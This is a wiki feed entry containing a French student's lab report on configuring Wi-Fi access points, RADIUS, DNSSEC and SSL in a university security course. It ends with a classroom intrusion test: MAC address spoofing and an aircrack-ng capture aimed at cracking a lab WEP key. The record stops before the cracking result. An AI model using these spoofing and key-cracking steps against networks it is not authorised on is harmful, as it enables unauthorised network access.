<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="fr">
		<id>https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Mstrunc</id>
		<title>Wiki d'activités IMA - Contributions de l’utilisateur [fr]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Mstrunc"/>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php/Sp%C3%A9cial:Contributions/Mstrunc"/>
		<updated>2026-04-24T15:55:17Z</updated>
		<subtitle>Contributions de l’utilisateur</subtitle>
		<generator>MediaWiki 1.29.2</generator>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23408</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23408"/>
				<updated>2015-11-27T15:01:28Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Ce mini projet a pour but de nous donner des notion en sécurité informatique.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Configuration du point d’accès&amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Restriction par adresse MAC &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère les adresses mac comme ci dessous.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@heron:~$ su&lt;br /&gt;
Mot de passe : &lt;br /&gt;
root@heron:/home/pifou# ifconfig &lt;br /&gt;
lo        Link encap:Boucle locale  &lt;br /&gt;
          inet adr:127.0.0.1  Masque:255.0.0.0&lt;br /&gt;
          adr inet6: ::1/128 Scope:Hôte&lt;br /&gt;
          UP LOOPBACK RUNNING  MTU:65536  Metric:1&lt;br /&gt;
          RX packets:2348 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:0 &lt;br /&gt;
          RX bytes:244556 (238.8 KiB)  TX bytes:244556 (238.8 KiB)&lt;br /&gt;
&lt;br /&gt;
wlan0     Link encap:Ethernet  HWaddr 00:22:43:43:e7:7d  &lt;br /&gt;
          inet adr:172.26.79.61  Bcast:172.26.79.255  Masque:255.255.240.0&lt;br /&gt;
          adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien&lt;br /&gt;
          adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global&lt;br /&gt;
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0&lt;br /&gt;
          TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:1000 &lt;br /&gt;
          RX bytes:7742849 (7.3 MiB)  TX bytes:1442360 (1.3 MiB)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration du point d’accès Cisco &amp;lt;/h3&amp;gt;&lt;br /&gt;
Conexion a la borne Cisco :&lt;br /&gt;
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth04:~$ su&lt;br /&gt;
pifou@zabeth04:~$ minicom&lt;br /&gt;
&lt;br /&gt;
// conexion au point Cisco &lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut autoriser les  adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#no access-list 701 deny  0000.0000.0000 ffff.ffff.ffff               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.6403  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.19f3  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T2&lt;br /&gt;
ap(config-ssid)#dot11 ssid T2 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
&lt;br /&gt;
ap(config-if)#ssid T2&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
ap(config)#interface Dot11Radio0&lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour voir si des machines sont connecté sur le point d’accès  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
sh do11 associations&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration du Wifi sur l'eeePC&amp;lt;/h3&amp;gt;&lt;br /&gt;
Cette partie me sert a valider le bon fonctionnement de mon point d’accès.&lt;br /&gt;
Je l'a réutiliserais dans la partie d'intrusion par adresse MAC. &lt;br /&gt;
&lt;br /&gt;
Configuration:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@heron:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Ethernet interface&lt;br /&gt;
#auto eth0&lt;br /&gt;
#iface eth0 inet static&lt;br /&gt;
#  address 172.26.79.241&lt;br /&gt;
#  netmask 255.255.240.0&lt;br /&gt;
#  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T2&lt;br /&gt;
	wireless-key 1111111111&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
conexion au PA&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifup wlan0&lt;br /&gt;
iwconfig wlan0 essid T2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on est bien connecté :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wlan0     IEEE 802.11bgn  ESSID:&amp;quot;T2&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.447 GHz  Access Point: C4:14:3C:12:EA:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:1111-1111-11&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=70/70  Signal level=-38 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:4104   Missed beacon:0&lt;br /&gt;
&lt;br /&gt;
lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Sécurisation Wifi par WPA2-EAP&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration du point d’accès&amp;lt;/h3&amp;gt;&lt;br /&gt;
On commence par remettre le point d’accès en configuration d'usine &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap#erase startup-config&lt;br /&gt;
ap#reload&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#line vty 0 15 &lt;br /&gt;
ap(config-line)#password ****&lt;br /&gt;
&lt;br /&gt;
ap(config)#ip default-gateway 172.20.99.254&lt;br /&gt;
&lt;br /&gt;
ap(config)#interface bvi 1 &lt;br /&gt;
ap(config-if)#ip ad 172.20.99.6 255.255.255.0 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration de la machine virtuel&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On installe freeradius: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# apt-get install FreeRadius&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On configure la conexion:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# nano eap.conf&lt;br /&gt;
// on remplace &lt;br /&gt;
default_eap_type = md5&lt;br /&gt;
// par&lt;br /&gt;
default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
# nano clients.conf &lt;br /&gt;
client 172.20.99.0/24 {&lt;br /&gt;
        secret          = topsecret&lt;br /&gt;
        shortname       = wifi&lt;br /&gt;
&lt;br /&gt;
# nano users &lt;br /&gt;
john    Cleartext-Password := &amp;quot;****&amp;quot;&lt;br /&gt;
&lt;br /&gt;
# service freeradius restart&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
telnet 172.20.99.5&lt;br /&gt;
&lt;br /&gt;
aaa authentication login eap_chien group radius_chien&lt;br /&gt;
radius-server host 193.48.57.181 auth-port 1812 acct-port 1813 key secret_chien&lt;br /&gt;
aaa group server radius radius_chien&lt;br /&gt;
server 193.48.57.181 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
dot11 ssid SSID_Chien&lt;br /&gt;
  vlan 6&lt;br /&gt;
  authentication open eap eap_chien&lt;br /&gt;
  authentication network-eap eap_chien&lt;br /&gt;
  authentication key-management wpa&lt;br /&gt;
  mbssid guest-mode&lt;br /&gt;
&lt;br /&gt;
ssid SSID_Chien&lt;br /&gt;
int dot11Radio 0.6&lt;br /&gt;
  encryption vlan 6 mode ciphers aes-ccm tkip&lt;br /&gt;
  encapsulation dot1Q 6&lt;br /&gt;
  bridge-group 6&lt;br /&gt;
&lt;br /&gt;
exit       &lt;br /&gt;
int gig0.6&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration du eeePc&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Installation des systèmes d'exploitation &amp;lt;/h1&amp;gt;&lt;br /&gt;
Dans ce chapitre je vais installer deux système d'exploitation , Il s'agit de Debian 8.&lt;br /&gt;
Dans un premier temps j’installerais une machine virtuel Xen sur la cordouan, le but étant par la suite de réaliser un serveur web sécurisé.&lt;br /&gt;
Dans une seconde partie j’installerais Debian 8 sur un des nouveau pc HP que nous avons reçut, nous nous en serviront pour la partie des tests d'intrusions. &lt;br /&gt;
  &lt;br /&gt;
&amp;lt;h2&amp;gt;Installation de la machine virtuel&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette partie concerne l’installation du machine virtuel Xen.&lt;br /&gt;
Nous installons Xen car celui-ci permet de faire de la  paravirtualisation. &lt;br /&gt;
Nous en avons besoins pour que chacun puisse installer son propre système d'exploitation et qu'ils soit utilisable en même temps &lt;br /&gt;
&lt;br /&gt;
Les étapes a suivre pour l’installation de Xen sur cordouan:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Conexion au serveur &lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
// Création de la Machine virtuel ( nom : chien)&lt;br /&gt;
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
// On observe la virtualisation&lt;br /&gt;
tail -f /var/log/xen-tools/chien.log&lt;br /&gt;
&lt;br /&gt;
root@cordouan:~# cd /etc/xen/&lt;br /&gt;
root@cordouan:/etc/xen# vim chien.cfg &lt;br /&gt;
// on met plus de memoire  =&amp;gt; 1024&lt;br /&gt;
// conexion en mode bridge=IMA2a&lt;br /&gt;
&lt;br /&gt;
root@cordouan:/etc/xen# xl list&lt;br /&gt;
root@cordouan:/etc/xen# xl create chien.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
connexion à notre MV:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
root@cordouan:/etc/xen# xl console chien&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration de Xen:&lt;br /&gt;
- On autorise les connexion ssh en root&lt;br /&gt;
- On retire Network Manger pour configurer la connexion au réseau manuellement &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# /etc/ssh/sshd_config&lt;br /&gt;
# PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
# if down eth0 &lt;br /&gt;
# ifup etho&lt;br /&gt;
# apt-get purge network-manage systemd &lt;br /&gt;
# inittable&lt;br /&gt;
// fin ligne tty0 ==&amp;gt; hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Configuration de eth0&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.181&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 gatway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
root@chien:~# ifdown eth0 &lt;br /&gt;
root@chien:~# ifup eth0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@chien:~# apt-get install vim strace tcpdump &lt;br /&gt;
root@chien:~# apt-get install host&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Services Internet &amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Serveur DNS&amp;lt;/h2&amp;gt;&lt;br /&gt;
modification du fichier /var/cache/bind option&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
cat /etc/bind/named.conf.options &lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
host -t ni love-in-the-world.space&lt;br /&gt;
host -t any love-in-the-world.space&lt;br /&gt;
&lt;br /&gt;
cat db.love-in-the-world &lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
cat /var/log/daemon.log&lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
# service bind9 stop&lt;br /&gt;
# service bind9 start&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Géneration d'une clés assymetrique:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE love-in-the-world.space&lt;br /&gt;
Generating key pair...........+++ ....................+++ &lt;br /&gt;
Klove-in-the-world.space.+005+14281&lt;br /&gt;
# mv Klove-in-the-world.space.+005+14281.key  love-in-the-world-ksk.key&lt;br /&gt;
# mv Klove-in-the-world.space.+005+14281.private  love-in-the-world-ksk.private&lt;br /&gt;
&lt;br /&gt;
# dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE love-in-the-world.space&lt;br /&gt;
Generating key pair........++++++ .....................++++++ &lt;br /&gt;
Klove-in-the-world.space.+005+37866&lt;br /&gt;
# mv Klove-in-the-world.space.+005+37866.key  love-in-the-world-zsk.key&lt;br /&gt;
# mv Klove-in-the-world.space.+005+37866.private  love-in-the-world-zsk.private&lt;br /&gt;
&lt;br /&gt;
# dnssec-signzone -o love-in-the-world.space -k love-in-the-world-ksk ../db.love-in-the-world love-in-the-world-zsk&lt;br /&gt;
Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
Zone fully signed:&lt;br /&gt;
Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
../db.love-in-the-world.signed&lt;br /&gt;
root@chien:/etc/bind/love-in-the-world# &lt;br /&gt;
&lt;br /&gt;
:/etc/bind# nano named.conf.local &lt;br /&gt;
zone &amp;quot;love-in-the-world.space&amp;quot;{&lt;br /&gt;
&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.love-in-the-world.signed&amp;quot;;&lt;br /&gt;
};&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
ensuite on copie le contenu du fichier:&lt;br /&gt;
dans gandi.net &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
on peut verifier que notre dns est secure a l'adresse suivante:&lt;br /&gt;
http://dnsviz.net/d/love-in-the-world.space/dnssec/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Recuperation du certificat SSL&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette étape consiste a récupérer le certificat SSL en vu authentifier et de sécuriser la connexion a notre serveur &lt;br /&gt;
&lt;br /&gt;
Instalation et Configuration de la boite Mail &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# apt-get install postfix bsd-mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
configuration de la boite mail &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 # nano /etc/aliases&lt;br /&gt;
   postmaster:    root&lt;br /&gt;
   admin: root&lt;br /&gt;
 &lt;br /&gt;
 # newaliases&lt;br /&gt;
 # mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je m'envoi un mail pour verifier le bon fonctionement de la boite mail &lt;br /&gt;
E-mail: admin@love-in-the-world.space&lt;br /&gt;
&lt;br /&gt;
Verfification:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# mailx&lt;br /&gt;
From Maxime.Strunc@polytech-lille.net  Fri Nov 20 13:22:24 2015&lt;br /&gt;
Return-Path: &amp;lt;Maxime.Strunc@polytech-lille.net&amp;gt;&lt;br /&gt;
X-Original-To: admin@love-in-the-world.space&lt;br /&gt;
Delivered-To: admin@love-in-the-world.space&lt;br /&gt;
Received: from peronne.escaut.net (peronne.escaut.net [193.48.57.26])&lt;br /&gt;
	by chien (Postfix) with ESMTP id E7DA93421F&lt;br /&gt;
	for &amp;lt;admin@love-in-the-world.space&amp;gt;; Fri, 20 Nov 2015 13:22:24 +0100 (CET)&lt;br /&gt;
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr&lt;br /&gt;
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr&lt;br /&gt;
Received: from webmailportal.polytech-lille.fr (hirson.escaut.net [193.48.57.37])&lt;br /&gt;
	(Authenticated sender: mstrunc)&lt;br /&gt;
	by peronne.escaut.net (Postfix) with ESMTPA id 305081C38&lt;br /&gt;
	for &amp;lt;admin@love-in-the-world.space&amp;gt;; Fri, 20 Nov 2015 11:33:52 +0100 (CET)&lt;br /&gt;
MIME-Version: 1.0&lt;br /&gt;
Content-Type: text/plain; charset=UTF-8;&lt;br /&gt;
 format=flowed&lt;br /&gt;
Content-Transfer-Encoding: 7bit&lt;br /&gt;
Date: Fri, 20 Nov 2015 11:33:52 +0100&lt;br /&gt;
From: Maxime Strunc &amp;lt;Maxime.Strunc@polytech-lille.net&amp;gt;&lt;br /&gt;
To: &amp;lt;admin@love-in-the-world.space&amp;gt;&lt;br /&gt;
Subject: Hello&lt;br /&gt;
Message-ID: &amp;lt;478f6b7d2da9875c32551984f2b92f9f@polytech-lille.net&amp;gt;&lt;br /&gt;
X-Sender: Maxime.Strunc@polytech-lille.net&lt;br /&gt;
User-Agent: Roundcube Webmail/0.7.2&lt;br /&gt;
Status: RO&lt;br /&gt;
&lt;br /&gt;
Hey it's working&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
- Recupération du Certificat:&lt;br /&gt;
Je vais sur Gandi.net&lt;br /&gt;
&lt;br /&gt;
génération de la CSR&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#   openssl req -nodes -newkey rsa:2048 -sha256 -keyout chien.key -out chien.csr&lt;br /&gt;
// Il ya plusieurs informations à rentrer, il y en a une très important : c'et le mail : &lt;br /&gt;
admin@love-in-the-world.space&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
apres avoir renseigner tout les champs, &lt;br /&gt;
j'obtient la CSR: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
       ... texte crypter...&lt;br /&gt;
-----END CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Je la copie dans l'emplacement voulue sur gandi.net&lt;br /&gt;
&lt;br /&gt;
Gandi m'envoi un mail a l'adresse informée &amp;quot;admin@love-in-the-world.space&amp;quot;&lt;br /&gt;
Il faut donc clique sur un lien de confimation et entrer la cles fournit dans le mail.&lt;br /&gt;
Une fois le certificat reçut, Je le copie et le colle dans le chien.crt et gandi.crt&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#nano 000-domain.tld-ssl.conf&lt;br /&gt;
    &amp;lt;VirtualHost 193.48.57.181:443&amp;gt;&lt;br /&gt;
&lt;br /&gt;
        ServerName www.love-in-the-world.space&lt;br /&gt;
        ServerAlias love-in-the-world.space&lt;br /&gt;
        DocumentRoot /var/www/html/&lt;br /&gt;
        CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
        SSLEngine on&lt;br /&gt;
        SSLCertificateFile /root/chien.crt&lt;br /&gt;
        SSLCertificateKeyFile /root/chien.key&lt;br /&gt;
        SSLCertificateChainFile /root/gandi.crt&lt;br /&gt;
        SSLVerifyClient None&lt;br /&gt;
&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#a2enmod ssl&lt;br /&gt;
#service apache2 reload&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Test d'intrusion &amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
En remplacant l'adresse mac de mon eeepc par une adresses MAC que le point d’accès T1 autorise je pourrais me connecter sur celui-ci.  &lt;br /&gt;
&lt;br /&gt;
Changement d'adresse MAC:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On change la cles par: 0000000000&lt;br /&gt;
et le SSID : T1&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# cat /etc/network/interfaces&lt;br /&gt;
# source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
# auto lo&lt;br /&gt;
# iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
Ethernet interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
  address 172.26.79.241&lt;br /&gt;
  netmask 255.255.240.0&lt;br /&gt;
  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T1&lt;br /&gt;
	wireless-key 0000000000&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Apres cette modification J'arrive a me connecter sur le point d’accès de Marouane(T1).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Préparation aux cassage de clés&amp;lt;/h2&amp;gt;&lt;br /&gt;
- Instalation aircrack-ng&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# apt-get install aircrack-ng firmware ralink&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
- Instalation du port usb-Wifi&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install firmware ralink&lt;br /&gt;
airmon-ng start wlan1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Cassage d'une cles WEP &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je scan le reseaux Wifi: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng mon0 --channel 5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J’identifie le ssid de cracotte06 et je met les donnée  dans un fichier nommé fcracotte06&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 root@Discus:/home/pifou# airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w&lt;br /&gt;
fcracotte06&lt;br /&gt;
&lt;br /&gt;
CH 5 ][ Elapsed: 0 s ][ 2015-11-20 09:05 &lt;br /&gt;
&lt;br /&gt;
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 -55 28 29 420 116 5 54e. WEP WEP cracotte06 &lt;br /&gt;
&lt;br /&gt;
BSSID STATION PWR Rate Lost Frames Probe &lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -48 36e-54e 80 456 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
La capture a donc commencé &lt;br /&gt;
&lt;br /&gt;
Dans un autre terminal:&lt;br /&gt;
Je vais analyser mon fichier de capture pour casser la cles.&lt;br /&gt;
